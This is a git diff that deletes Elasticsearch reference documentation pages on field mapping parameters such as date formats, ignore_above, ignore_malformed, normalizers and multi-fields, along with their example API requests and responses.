of file diff --git a/docs/reference/mapping/params/format.asciidoc b/docs/reference/mapping/params/format.asciidoc deleted file mode 100644 index df66a3b64f9..00000000000 --- a/docs/reference/mapping/params/format.asciidoc +++ /dev/null @@ -1,291 +0,0 @@ -[[mapping-date-format]] -=== `format` - -In JSON documents, dates are represented as strings. Elasticsearch uses a set -of preconfigured formats to recognize and parse these strings into a long -value representing _milliseconds-since-the-epoch_ in UTC. - -Besides the <>, your own -<> can be specified using the familiar -`yyyy/MM/dd` syntax: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "date": { - "type": "date", - "format": "yyyy-MM-dd" - } - } - } -} --------------------------------------------------- - -Many APIs which support date values also support <> -expressions, such as `now-1m/d` -- the current time, minus one month, rounded -down to the nearest day. 
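As a brief illustration (not part of the original page; the index and field names are arbitrary), a date field can accept several formats separated by `||`, and range queries on it can then use date math:

[source,console]
--------------------------------------------------
PUT my-index-000001
{
  "mappings": {
    "properties": {
      "date": {
        "type": "date",
        "format": "yyyy-MM-dd||epoch_millis" <1>
      }
    }
  }
}

GET my-index-000001/_search
{
  "query": {
    "range": {
      "date": {
        "gte": "now-1M/d" <2>
      }
    }
  }
}
--------------------------------------------------

<1> Accepts either a `yyyy-MM-dd` string or a number of milliseconds since the epoch.
<2> Date math: one month ago, rounded down to the nearest day.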
- -[[custom-date-formats]] -==== Custom date formats - -Completely customizable date formats are supported. The syntax for these is explained -https://docs.oracle.com/javase/8/docs/api/java/time/format/DateTimeFormatter.html[DateTimeFormatter docs]. - -[[built-in-date-formats]] -==== Built In Formats - -Most of the below formats have a `strict` companion format, which means that -year, month and day parts of the week must use respectively 4, 2 and 2 digits -exactly, potentially prepending zeros. For instance a date like `5/11/1` would -be considered invalid and would need to be rewritten to `2005/11/01` to be -accepted by the date parser. - -To use them, you need to prepend `strict_` to the name of the date format, for -instance `strict_date_optional_time` instead of `date_optional_time`. - -These strict date formats are especially useful when -<> in order to make sure to -not accidentally map irrelevant strings as dates. - -The following tables lists all the defaults ISO formats supported: - -`epoch_millis`:: - - A formatter for the number of milliseconds since the epoch. Note, that - this timestamp is subject to the limits of a Java `Long.MIN_VALUE` and - `Long.MAX_VALUE`. - -`epoch_second`:: - - A formatter for the number of seconds since the epoch. Note, that this - timestamp is subject to the limits of a Java `Long.MIN_VALUE` and `Long. - MAX_VALUE` divided by 1000 (the number of milliseconds in a second). - -[[strict-date-time]]`date_optional_time` or `strict_date_optional_time`:: - - A generic ISO datetime parser, where the date must include the year at a minimum, and the time - (separated by `T`), is optional. - Examples: `yyyy-MM-dd'T'HH:mm:ss.SSSZ` or `yyyy-MM-dd`. - -[[strict-date-time-nanos]]`strict_date_optional_time_nanos`:: - - A generic ISO datetime parser, where the date must include the year at a minimum, and the time - (separated by `T`), is optional. The fraction of a second - part has a nanosecond resolution. - Examples: `yyyy-MM-dd'T'HH:mm:ss.SSSSSSZ` or `yyyy-MM-dd`. - -`basic_date`:: - - A basic formatter for a full date as four digit year, two digit month of - year, and two digit day of month: `yyyyMMdd`. - -`basic_date_time`:: - - A basic formatter that combines a basic date and time, separated by a 'T': - `yyyyMMdd'T'HHmmss.SSSZ`. - -`basic_date_time_no_millis`:: - - A basic formatter that combines a basic date and time without millis, - separated by a 'T': `yyyyMMdd'T'HHmmssZ`. - -`basic_ordinal_date`:: - - A formatter for a full ordinal date, using a four digit year and three - digit dayOfYear: `yyyyDDD`. - -`basic_ordinal_date_time`:: - - A formatter for a full ordinal date and time, using a four digit year and - three digit dayOfYear: `yyyyDDD'T'HHmmss.SSSZ`. - -`basic_ordinal_date_time_no_millis`:: - - A formatter for a full ordinal date and time without millis, using a four - digit year and three digit dayOfYear: `yyyyDDD'T'HHmmssZ`. - -`basic_time`:: - - A basic formatter for a two digit hour of day, two digit minute of hour, - two digit second of minute, three digit millis, and time zone offset: - `HHmmss.SSSZ`. - -`basic_time_no_millis`:: - - A basic formatter for a two digit hour of day, two digit minute of hour, - two digit second of minute, and time zone offset: `HHmmssZ`. - -`basic_t_time`:: - - A basic formatter for a two digit hour of day, two digit minute of hour, - two digit second of minute, three digit millis, and time zone off set - prefixed by 'T': `'T'HHmmss.SSSZ`. 
- -`basic_t_time_no_millis`:: - - A basic formatter for a two digit hour of day, two digit minute of hour, - two digit second of minute, and time zone offset prefixed by 'T': - `'T'HHmmssZ`. - -`basic_week_date` or `strict_basic_week_date`:: - - A basic formatter for a full date as four digit weekyear, two digit week - of weekyear, and one digit day of week: `xxxx'W'wwe`. - -`basic_week_date_time` or `strict_basic_week_date_time`:: - - A basic formatter that combines a basic weekyear date and time, separated - by a 'T': `xxxx'W'wwe'T'HHmmss.SSSZ`. - -`basic_week_date_time_no_millis` or `strict_basic_week_date_time_no_millis`:: - - A basic formatter that combines a basic weekyear date and time without - millis, separated by a 'T': `xxxx'W'wwe'T'HHmmssZ`. - -`date` or `strict_date`:: - - A formatter for a full date as four digit year, two digit month of year, - and two digit day of month: `yyyy-MM-dd`. - -`date_hour` or `strict_date_hour`:: - - A formatter that combines a full date and two digit hour of day: - `yyyy-MM-dd'T'HH`. - -`date_hour_minute` or `strict_date_hour_minute`:: - - A formatter that combines a full date, two digit hour of day, and two - digit minute of hour: `yyyy-MM-dd'T'HH:mm`. - -`date_hour_minute_second` or `strict_date_hour_minute_second`:: - - A formatter that combines a full date, two digit hour of day, two digit - minute of hour, and two digit second of minute: `yyyy-MM-dd'T'HH:mm:ss`. - -`date_hour_minute_second_fraction` or `strict_date_hour_minute_second_fraction`:: - - A formatter that combines a full date, two digit hour of day, two digit - minute of hour, two digit second of minute, and three digit fraction of - second: `yyyy-MM-dd'T'HH:mm:ss.SSS`. - -`date_hour_minute_second_millis` or `strict_date_hour_minute_second_millis`:: - - A formatter that combines a full date, two digit hour of day, two digit - minute of hour, two digit second of minute, and three digit fraction of - second: `yyyy-MM-dd'T'HH:mm:ss.SSS`. - -`date_time` or `strict_date_time`:: - - A formatter that combines a full date and time, separated by a 'T': - `yyyy-MM-dd'T'HH:mm:ss.SSSZZ`. - -`date_time_no_millis` or `strict_date_time_no_millis`:: - - A formatter that combines a full date and time without millis, separated - by a 'T': `yyyy-MM-dd'T'HH:mm:ssZZ`. - -`hour` or `strict_hour`:: - - A formatter for a two digit hour of day: `HH` - -`hour_minute` or `strict_hour_minute`:: - - A formatter for a two digit hour of day and two digit minute of hour: - `HH:mm`. - -`hour_minute_second` or `strict_hour_minute_second`:: - - A formatter for a two digit hour of day, two digit minute of hour, and two - digit second of minute: `HH:mm:ss`. - -`hour_minute_second_fraction` or `strict_hour_minute_second_fraction`:: - - A formatter for a two digit hour of day, two digit minute of hour, two - digit second of minute, and three digit fraction of second: `HH:mm:ss.SSS`. - -`hour_minute_second_millis` or `strict_hour_minute_second_millis`:: - - A formatter for a two digit hour of day, two digit minute of hour, two - digit second of minute, and three digit fraction of second: `HH:mm:ss.SSS`. - -`ordinal_date` or `strict_ordinal_date`:: - - A formatter for a full ordinal date, using a four digit year and three - digit dayOfYear: `yyyy-DDD`. - -`ordinal_date_time` or `strict_ordinal_date_time`:: - - A formatter for a full ordinal date and time, using a four digit year and - three digit dayOfYear: `yyyy-DDD'T'HH:mm:ss.SSSZZ`. 
- -`ordinal_date_time_no_millis` or `strict_ordinal_date_time_no_millis`:: - - A formatter for a full ordinal date and time without millis, using a four - digit year and three digit dayOfYear: `yyyy-DDD'T'HH:mm:ssZZ`. - -`time` or `strict_time`:: - - A formatter for a two digit hour of day, two digit minute of hour, two - digit second of minute, three digit fraction of second, and time zone - offset: `HH:mm:ss.SSSZZ`. - -`time_no_millis` or `strict_time_no_millis`:: - - A formatter for a two digit hour of day, two digit minute of hour, two - digit second of minute, and time zone offset: `HH:mm:ssZZ`. - -`t_time` or `strict_t_time`:: - - A formatter for a two digit hour of day, two digit minute of hour, two - digit second of minute, three digit fraction of second, and time zone - offset prefixed by 'T': `'T'HH:mm:ss.SSSZZ`. - -`t_time_no_millis` or `strict_t_time_no_millis`:: - - A formatter for a two digit hour of day, two digit minute of hour, two - digit second of minute, and time zone offset prefixed by 'T': `'T'HH:mm:ssZZ`. - -`week_date` or `strict_week_date`:: - - A formatter for a full date as four digit weekyear, two digit week of - weekyear, and one digit day of week: `xxxx-'W'ww-e`. - -`week_date_time` or `strict_week_date_time`:: - - A formatter that combines a full weekyear date and time, separated by a - 'T': `xxxx-'W'ww-e'T'HH:mm:ss.SSSZZ`. - -`week_date_time_no_millis` or `strict_week_date_time_no_millis`:: - - A formatter that combines a full weekyear date and time without millis, - separated by a 'T': `xxxx-'W'ww-e'T'HH:mm:ssZZ`. - -`weekyear` or `strict_weekyear`:: - - A formatter for a four digit weekyear: `xxxx`. - -`weekyear_week` or `strict_weekyear_week`:: - - A formatter for a four digit weekyear and two digit week of weekyear: - `xxxx-'W'ww`. - -`weekyear_week_day` or `strict_weekyear_week_day`:: - - A formatter for a four digit weekyear, two digit week of weekyear, and one - digit day of week: `xxxx-'W'ww-e`. - -`year` or `strict_year`:: - - A formatter for a four digit year: `yyyy`. - -`year_month` or `strict_year_month`:: - - A formatter for a four digit year and two digit month of year: `yyyy-MM`. - -`year_month_day` or `strict_year_month_day`:: - - A formatter for a four digit year, two digit month of year, and two digit - day of month: `yyyy-MM-dd`. diff --git a/docs/reference/mapping/params/ignore-above.asciidoc b/docs/reference/mapping/params/ignore-above.asciidoc deleted file mode 100644 index d144e4ef9ea..00000000000 --- a/docs/reference/mapping/params/ignore-above.asciidoc +++ /dev/null @@ -1,59 +0,0 @@ -[[ignore-above]] -=== `ignore_above` - -Strings longer than the `ignore_above` setting will not be indexed or stored. -For arrays of strings, `ignore_above` will be applied for each array element separately and string elements longer than `ignore_above` will not be indexed or stored. - -NOTE: All strings/array elements will still be present in the `_source` field, if the latter is enabled which is the default in Elasticsearch. 
- -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "message": { - "type": "keyword", - "ignore_above": 20 <1> - } - } - } -} - -PUT my-index-000001/_doc/1 <2> -{ - "message": "Syntax error" -} - -PUT my-index-000001/_doc/2 <3> -{ - "message": "Syntax error with some long stacktrace" -} - -GET my-index-000001/_search <4> -{ - "aggs": { - "messages": { - "terms": { - "field": "message" - } - } - } -} --------------------------------------------------- - -<1> This field will ignore any string longer than 20 characters. -<2> This document is indexed successfully. -<3> This document will be indexed, but without indexing the `message` field. -<4> Search returns both documents, but only the first is present in the terms aggregation. - -TIP: The `ignore_above` setting can be updated on -existing fields using the <>. - -This option is also useful for protecting against Lucene's term byte-length -limit of `32766`. - -NOTE: The value for `ignore_above` is the _character count_, but Lucene counts -bytes. If you use UTF-8 text with many non-ASCII characters, you may want to -set the limit to `32766 / 4 = 8191` since UTF-8 characters may occupy at most -4 bytes. diff --git a/docs/reference/mapping/params/ignore-malformed.asciidoc b/docs/reference/mapping/params/ignore-malformed.asciidoc deleted file mode 100644 index 69f66a0681c..00000000000 --- a/docs/reference/mapping/params/ignore-malformed.asciidoc +++ /dev/null @@ -1,114 +0,0 @@ -[[ignore-malformed]] -=== `ignore_malformed` - -Sometimes you don't have much control over the data that you receive. One -user may send a `login` field that is a <>, and another sends a -`login` field that is an email address. - -Trying to index the wrong data type into a field throws an exception by -default, and rejects the whole document. The `ignore_malformed` parameter, if -set to `true`, allows the exception to be ignored. The malformed field is not -indexed, but other fields in the document are processed normally. - -For example: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "number_one": { - "type": "integer", - "ignore_malformed": true - }, - "number_two": { - "type": "integer" - } - } - } -} - -PUT my-index-000001/_doc/1 -{ - "text": "Some text value", - "number_one": "foo" <1> -} - -PUT my-index-000001/_doc/2 -{ - "text": "Some text value", - "number_two": "foo" <2> -} --------------------------------------------------- -// TEST[catch:bad_request] - -<1> This document will have the `text` field indexed, but not the `number_one` field. -<2> This document will be rejected because `number_two` does not allow malformed values. - -The `ignore_malformed` setting is currently supported by the following <>: - -<>:: `long`, `integer`, `short`, `byte`, `double`, `float`, `half_float`, `scaled_float` -<>:: `date` -<>:: `date_nanos` -<>:: `geo_point` for lat/lon points -<>:: `geo_shape` for complex shapes like polygons -<>:: `ip` for IPv4 and IPv6 addresses - -TIP: The `ignore_malformed` setting value can be updated on -existing fields using the <>. - -[[ignore-malformed-setting]] -==== Index-level default - -The `index.mapping.ignore_malformed` setting can be set on the index level to -ignore malformed content globally across all allowed mapping types. -Mapping types that don't support the setting will ignore it if set on the index level. 
- -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "settings": { - "index.mapping.ignore_malformed": true <1> - }, - "mappings": { - "properties": { - "number_one": { <1> - "type": "byte" - }, - "number_two": { - "type": "integer", - "ignore_malformed": false <2> - } - } - } -} --------------------------------------------------- - -<1> The `number_one` field inherits the index-level setting. -<2> The `number_two` field overrides the index-level setting to turn off `ignore_malformed`. - -==== Dealing with malformed fields - -Malformed fields are silently ignored at indexing time when `ignore_malformed` -is turned on. Whenever possible it is recommended to keep the number of -documents that have a malformed field contained, or queries on this field will -become meaningless. Elasticsearch makes it easy to check how many documents -have malformed fields by using `exists`,`term` or `terms` queries on the special -<> field. - -[[json-object-limits]] -==== Limits for JSON Objects -You can't use `ignore_malformed` with the following data types: - -* <> -* <> -* <> - -You also can't use `ignore_malformed` to ignore JSON objects submitted to fields -of the wrong data type. A JSON object is any data surrounded by curly brackets -`"{}"` and includes data mapped to the nested, object, and range data types. - -If you submit a JSON object to an unsupported field, {es} will return an error -and reject the entire document regardless of the `ignore_malformed` setting. diff --git a/docs/reference/mapping/params/index-options.asciidoc b/docs/reference/mapping/params/index-options.asciidoc deleted file mode 100644 index 87178e6fc64..00000000000 --- a/docs/reference/mapping/params/index-options.asciidoc +++ /dev/null @@ -1,67 +0,0 @@ -[[index-options]] -=== `index_options` - -The `index_options` parameter controls what information is added to the -inverted index for search and highlighting purposes. - -[WARNING] -==== -The `index_options` parameter is intended for use with <> fields -only. Avoid using `index_options` with other field data types. -==== - -It accepts the following values: - -`docs`:: -Only the doc number is indexed. Can answer the question _Does this term -exist in this field?_ - -`freqs`:: -Doc number and term frequencies are indexed. Term frequencies are used to -score repeated terms higher than single terms. - -`positions` (default):: -Doc number, term frequencies, and term positions (or order) are indexed. -Positions can be used for -<>. - -`offsets`:: -Doc number, term frequencies, positions, and start and end character -offsets (which map the term back to the original string) are indexed. -Offsets are used by the <> to speed up highlighting. - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "text": { - "type": "text", - "index_options": "offsets" - } - } - } -} - -PUT my-index-000001/_doc/1 -{ - "text": "Quick brown fox" -} - -GET my-index-000001/_search -{ - "query": { - "match": { - "text": "brown fox" - } - }, - "highlight": { - "fields": { - "text": {} <1> - } - } -} --------------------------------------------------- - -<1> The `text` field will use the postings for the highlighting by default because `offsets` are indexed. 
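Conversely, if a `text` field is only ever used for simple match filtering and never for phrase queries, frequency-based scoring, or highlighting, a lighter setting can be chosen. This is a hypothetical sketch; the index and field names are invented:

[source,console]
--------------------------------------------------
PUT my-index-000002
{
  "mappings": {
    "properties": {
      "labels": {
        "type": "text",
        "index_options": "docs" <1>
      }
    }
  }
}
--------------------------------------------------

<1> Only doc numbers are indexed, so phrase queries and offset-based highlighting are not available on this field.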
diff --git a/docs/reference/mapping/params/index-phrases.asciidoc b/docs/reference/mapping/params/index-phrases.asciidoc deleted file mode 100644 index 1b169a33dcc..00000000000 --- a/docs/reference/mapping/params/index-phrases.asciidoc +++ /dev/null @@ -1,8 +0,0 @@ -[[index-phrases]] -=== `index_phrases` - -If enabled, two-term word combinations ('shingles') are indexed into a separate -field. This allows exact phrase queries (no slop) to run more efficiently, at the expense -of a larger index. Note that this works best when stopwords are not removed, -as phrases containing stopwords will not use the subsidiary field and will fall -back to a standard phrase query. Accepts `true` or `false` (default). \ No newline at end of file diff --git a/docs/reference/mapping/params/index-prefixes.asciidoc b/docs/reference/mapping/params/index-prefixes.asciidoc deleted file mode 100644 index 1184245ca15..00000000000 --- a/docs/reference/mapping/params/index-prefixes.asciidoc +++ /dev/null @@ -1,56 +0,0 @@ -[[index-prefixes]] -=== `index_prefixes` - -The `index_prefixes` parameter enables the indexing of term prefixes to speed -up prefix searches. It accepts the following optional settings: - -[horizontal] -`min_chars`:: - - The minimum prefix length to index. Must be greater than 0, and defaults - to 2. The value is inclusive. - -`max_chars`:: - - The maximum prefix length to index. Must be less than 20, and defaults to 5. - The value is inclusive. - -This example creates a text field using the default prefix length settings: - -[source,console] --------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "body_text": { - "type": "text", - "index_prefixes": { } <1> - } - } - } -} --------------------------------- - -<1> An empty settings object will use the default `min_chars` and `max_chars` -settings - -This example uses custom prefix length settings: - -[source,console] --------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "full_name": { - "type": "text", - "index_prefixes": { - "min_chars" : 1, - "max_chars" : 10 - } - } - } - } -} --------------------------------- diff --git a/docs/reference/mapping/params/index.asciidoc b/docs/reference/mapping/params/index.asciidoc deleted file mode 100644 index 32916e98d35..00000000000 --- a/docs/reference/mapping/params/index.asciidoc +++ /dev/null @@ -1,6 +0,0 @@ -[[mapping-index]] -=== `index` - -The `index` option controls whether field values are indexed. It accepts `true` -or `false` and defaults to `true`. Fields that are not indexed are not queryable. - diff --git a/docs/reference/mapping/params/meta.asciidoc b/docs/reference/mapping/params/meta.asciidoc deleted file mode 100644 index d97c9c1a214..00000000000 --- a/docs/reference/mapping/params/meta.asciidoc +++ /dev/null @@ -1,31 +0,0 @@ -[[mapping-field-meta]] -=== `meta` - -Metadata attached to the field. This metadata is opaque to Elasticsearch, it is -only useful for multiple applications that work on the same indices to share -meta information about fields such as units - -[source,console] ------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "latency": { - "type": "long", - "meta": { - "unit": "ms" - } - } - } - } -} ------------- -// TEST - -NOTE: Field metadata enforces at most 5 entries, that keys have a length that -is less than or equal to 20, and that values are strings whose length is less -than or equal to 50. - -NOTE: Field metadata is updatable by submitting a mapping update. 
The metadata -of the update will override the metadata of the existing field. diff --git a/docs/reference/mapping/params/multi-fields.asciidoc b/docs/reference/mapping/params/multi-fields.asciidoc deleted file mode 100644 index fcf828db890..00000000000 --- a/docs/reference/mapping/params/multi-fields.asciidoc +++ /dev/null @@ -1,128 +0,0 @@ -[[multi-fields]] -=== `fields` - -It is often useful to index the same field in different ways for different -purposes. This is the purpose of _multi-fields_. For instance, a `string` -field could be mapped as a `text` field for full-text -search, and as a `keyword` field for sorting or aggregations: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "city": { - "type": "text", - "fields": { - "raw": { <1> - "type": "keyword" - } - } - } - } - } -} - -PUT my-index-000001/_doc/1 -{ - "city": "New York" -} - -PUT my-index-000001/_doc/2 -{ - "city": "York" -} - -GET my-index-000001/_search -{ - "query": { - "match": { - "city": "york" <2> - } - }, - "sort": { - "city.raw": "asc" <3> - }, - "aggs": { - "Cities": { - "terms": { - "field": "city.raw" <3> - } - } - } -} --------------------------------------------------- - -<1> The `city.raw` field is a `keyword` version of the `city` field. -<2> The `city` field can be used for full text search. -<3> The `city.raw` field can be used for sorting and aggregations - -NOTE: Multi-fields do not change the original `_source` field. - -TIP: New multi-fields can be added to existing -fields using the <>. - -==== Multi-fields with multiple analyzers - -Another use case of multi-fields is to analyze the same field in different -ways for better relevance. For instance we could index a field with the -<> which breaks text up into -words, and again with the <> -which stems words into their root form: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "text": { <1> - "type": "text", - "fields": { - "english": { <2> - "type": "text", - "analyzer": "english" - } - } - } - } - } -} - -PUT my-index-000001/_doc/1 -{ "text": "quick brown fox" } <3> - -PUT my-index-000001/_doc/2 -{ "text": "quick brown foxes" } <3> - -GET my-index-000001/_search -{ - "query": { - "multi_match": { - "query": "quick brown foxes", - "fields": [ <4> - "text", - "text.english" - ], - "type": "most_fields" <4> - } - } -} --------------------------------------------------- - -<1> The `text` field uses the `standard` analyzer. -<2> The `text.english` field uses the `english` analyzer. -<3> Index two documents, one with `fox` and the other with `foxes`. -<4> Query both the `text` and `text.english` fields and combine the scores. - -The `text` field contains the term `fox` in the first document and `foxes` in -the second document. The `text.english` field contains `fox` for both -documents, because `foxes` is stemmed to `fox`. - -The query string is also analyzed by the `standard` analyzer for the `text` -field, and by the `english` analyzer for the `text.english` field. The -stemmed field allows a query for `foxes` to also match the document containing -just `fox`. This allows us to match as many documents as possible. By also -querying the unstemmed `text` field, we improve the relevance score of the -document which matches `foxes` exactly. 
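One way to see the difference between the two sub-fields is to run the same text through the `_analyze` API against each of them. This check is illustrative and not part of the original example:

[source,console]
--------------------------------------------------
GET my-index-000001/_analyze
{
  "field": "text.english", <1>
  "text": "quick brown foxes"
}
--------------------------------------------------

<1> Analyzing against `text.english` returns the stemmed tokens `quick`, `brown`, `fox`, while analyzing against `text` keeps `foxes` unchanged.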
diff --git a/docs/reference/mapping/params/normalizer.asciidoc b/docs/reference/mapping/params/normalizer.asciidoc deleted file mode 100644 index 3eb340cc745..00000000000 --- a/docs/reference/mapping/params/normalizer.asciidoc +++ /dev/null @@ -1,181 +0,0 @@ -[[normalizer]] -=== `normalizer` - -The `normalizer` property of <> fields is similar to -<> except that it guarantees that the analysis chain -produces a single token. - -The `normalizer` is applied prior to indexing the keyword, as well as at -search-time when the `keyword` field is searched via a query parser such as -the <> query or via a term-level query -such as the <> query. - -A simple normalizer called `lowercase` ships with elasticsearch and can be used. -Custom normalizers can be defined as part of analysis settings as follows. - - -[source,console] --------------------------------- -PUT index -{ - "settings": { - "analysis": { - "normalizer": { - "my_normalizer": { - "type": "custom", - "char_filter": [], - "filter": ["lowercase", "asciifolding"] - } - } - } - }, - "mappings": { - "properties": { - "foo": { - "type": "keyword", - "normalizer": "my_normalizer" - } - } - } -} - -PUT index/_doc/1 -{ - "foo": "BÀR" -} - -PUT index/_doc/2 -{ - "foo": "bar" -} - -PUT index/_doc/3 -{ - "foo": "baz" -} - -POST index/_refresh - -GET index/_search -{ - "query": { - "term": { - "foo": "BAR" - } - } -} - -GET index/_search -{ - "query": { - "match": { - "foo": "BAR" - } - } -} --------------------------------- - -The above queries match documents 1 and 2 since `BÀR` is converted to `bar` at -both index and query time. - -[source,console-result] ----------------------------- -{ - "took": $body.took, - "timed_out": false, - "_shards": { - "total": 1, - "successful": 1, - "skipped" : 0, - "failed": 0 - }, - "hits": { - "total" : { - "value": 2, - "relation": "eq" - }, - "max_score": 0.4700036, - "hits": [ - { - "_index": "index", - "_type": "_doc", - "_id": "1", - "_score": 0.4700036, - "_source": { - "foo": "BÀR" - } - }, - { - "_index": "index", - "_type": "_doc", - "_id": "2", - "_score": 0.4700036, - "_source": { - "foo": "bar" - } - } - ] - } -} ----------------------------- -// TESTRESPONSE[s/"took".*/"took": "$body.took",/] - -Also, the fact that keywords are converted prior to indexing also means that -aggregations return normalized values: - -[source,console] ----------------------------- -GET index/_search -{ - "size": 0, - "aggs": { - "foo_terms": { - "terms": { - "field": "foo" - } - } - } -} ----------------------------- -// TEST[continued] - -returns - -[source,console-result] ----------------------------- -{ - "took": 43, - "timed_out": false, - "_shards": { - "total": 1, - "successful": 1, - "skipped" : 0, - "failed": 0 - }, - "hits": { - "total" : { - "value": 3, - "relation": "eq" - }, - "max_score": null, - "hits": [] - }, - "aggregations": { - "foo_terms": { - "doc_count_error_upper_bound": 0, - "sum_other_doc_count": 0, - "buckets": [ - { - "key": "bar", - "doc_count": 2 - }, - { - "key": "baz", - "doc_count": 1 - } - ] - } - } -} ----------------------------- -// TESTRESPONSE[s/"took".*/"took": "$body.took",/] diff --git a/docs/reference/mapping/params/norms.asciidoc b/docs/reference/mapping/params/norms.asciidoc deleted file mode 100644 index 303c2af5ecc..00000000000 --- a/docs/reference/mapping/params/norms.asciidoc +++ /dev/null @@ -1,38 +0,0 @@ -[[norms]] -=== `norms` - -Norms store various normalization factors that are later used at query time -in order to compute the score of a document relatively to a query. 
- -Although useful for scoring, norms also require quite a lot of disk -(typically in the order of one byte per document per field in your index, even -for documents that don't have this specific field). As a consequence, if you -don't need scoring on a specific field, you should disable norms on that -field. In particular, this is the case for fields that are used solely for -filtering or aggregations. - -TIP: Norms can be disabled on existing fields using -the <>. - -Norms can be disabled (but not reenabled after the fact), using the -<> like so: - -[source,console] ------------- -PUT my-index-000001/_mapping -{ - "properties": { - "title": { - "type": "text", - "norms": false - } - } -} ------------- -// TEST[s/^/PUT my-index-000001\n/] - -NOTE: Norms will not be removed instantly, but will be removed as old segments -are merged into new segments as you continue indexing new documents. Any score -computation on a field that has had norms removed might return inconsistent -results since some documents won't have norms anymore while other documents -might still have norms. diff --git a/docs/reference/mapping/params/null-value.asciidoc b/docs/reference/mapping/params/null-value.asciidoc deleted file mode 100644 index f1737ed5ace..00000000000 --- a/docs/reference/mapping/params/null-value.asciidoc +++ /dev/null @@ -1,53 +0,0 @@ -[[null-value]] -=== `null_value` - -A `null` value cannot be indexed or searched. When a field is set to `null`, -(or an empty array or an array of `null` values) it is treated as though that -field has no values. - -The `null_value` parameter allows you to replace explicit `null` values with -the specified value so that it can be indexed and searched. For instance: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "status_code": { - "type": "keyword", - "null_value": "NULL" <1> - } - } - } -} - -PUT my-index-000001/_doc/1 -{ - "status_code": null -} - -PUT my-index-000001/_doc/2 -{ - "status_code": [] <2> -} - -GET my-index-000001/_search -{ - "query": { - "term": { - "status_code": "NULL" <3> - } - } -} --------------------------------------------------- - -<1> Replace explicit `null` values with the term `NULL`. -<2> An empty array does not contain an explicit `null`, and so won't be replaced with the `null_value`. -<3> A query for `NULL` returns document 1, but not document 2. - -IMPORTANT: The `null_value` needs to be the same data type as the field. For -instance, a `long` field cannot have a string `null_value`. - -NOTE: The `null_value` only influences how data is indexed, it doesn't modify -the `_source` document. diff --git a/docs/reference/mapping/params/position-increment-gap.asciidoc b/docs/reference/mapping/params/position-increment-gap.asciidoc deleted file mode 100644 index 39b7b87cb3b..00000000000 --- a/docs/reference/mapping/params/position-increment-gap.asciidoc +++ /dev/null @@ -1,85 +0,0 @@ -[[position-increment-gap]] -=== `position_increment_gap` - -<> text fields take term <> -into account, in order to be able to support -<>. -When indexing text fields with multiple values a "fake" gap is added between -the values to prevent most phrase queries from matching across the values. The -size of this gap is configured using `position_increment_gap` and defaults to -`100`. 
- -For example: - -[source,console] --------------------------------------------------- -PUT my-index-000001/_doc/1 -{ - "names": [ "John Abraham", "Lincoln Smith"] -} - -GET my-index-000001/_search -{ - "query": { - "match_phrase": { - "names": { - "query": "Abraham Lincoln" <1> - } - } - } -} - -GET my-index-000001/_search -{ - "query": { - "match_phrase": { - "names": { - "query": "Abraham Lincoln", - "slop": 101 <2> - } - } - } -} --------------------------------------------------- - -<1> This phrase query doesn't match our document which is totally expected. -<2> This phrase query matches our document, even though `Abraham` and `Lincoln` - are in separate strings, because `slop` > `position_increment_gap`. - - -The `position_increment_gap` can be specified in the mapping. For instance: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "names": { - "type": "text", - "position_increment_gap": 0 <1> - } - } - } -} - -PUT my-index-000001/_doc/1 -{ - "names": [ "John Abraham", "Lincoln Smith"] -} - -GET my-index-000001/_search -{ - "query": { - "match_phrase": { - "names": "Abraham Lincoln" <2> - } - } -} --------------------------------------------------- - -<1> The first term in the next array element will be 0 terms apart from the - last term in the previous array element. -<2> The phrase query matches our document which is weird, but its what we asked - for in the mapping. - diff --git a/docs/reference/mapping/params/properties.asciidoc b/docs/reference/mapping/params/properties.asciidoc deleted file mode 100644 index 1f3330062c2..00000000000 --- a/docs/reference/mapping/params/properties.asciidoc +++ /dev/null @@ -1,101 +0,0 @@ -[[properties]] -=== `properties` - -Type mappings, <> and <> -contain sub-fields, called `properties`. These properties may be of any -<>, including `object` and `nested`. Properties can -be added: - -* explicitly by defining them when <>. -* explicitly by defining them when adding or updating a mapping type with the <> API. -* <> just by indexing documents containing new fields. - -Below is an example of adding `properties` to a mapping type, an `object` -field, and a `nested` field: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { <1> - "manager": { - "properties": { <2> - "age": { "type": "integer" }, - "name": { "type": "text" } - } - }, - "employees": { - "type": "nested", - "properties": { <3> - "age": { "type": "integer" }, - "name": { "type": "text" } - } - } - } - } -} - -PUT my-index-000001/_doc/1 <4> -{ - "region": "US", - "manager": { - "name": "Alice White", - "age": 30 - }, - "employees": [ - { - "name": "John Smith", - "age": 34 - }, - { - "name": "Peter Brown", - "age": 26 - } - ] -} --------------------------------------------------- - -<1> Properties in the top-level mappings definition. -<2> Properties under the `manager` object field. -<3> Properties under the `employees` nested field. -<4> An example document which corresponds to the above mapping. - -TIP: The `properties` setting is allowed to have different settings for fields -of the same name in the same index. New properties can be added to existing -fields using the <>. 
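For instance, a new sub-field could later be added under the `manager` object with the update mapping API. This is a minimal sketch that assumes the index defined above; the `email` field is invented for illustration:

[source,console]
--------------------------------------------------
PUT my-index-000001/_mapping
{
  "properties": {
    "manager": {
      "properties": {
        "email": { "type": "keyword" }
      }
    }
  }
}
--------------------------------------------------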
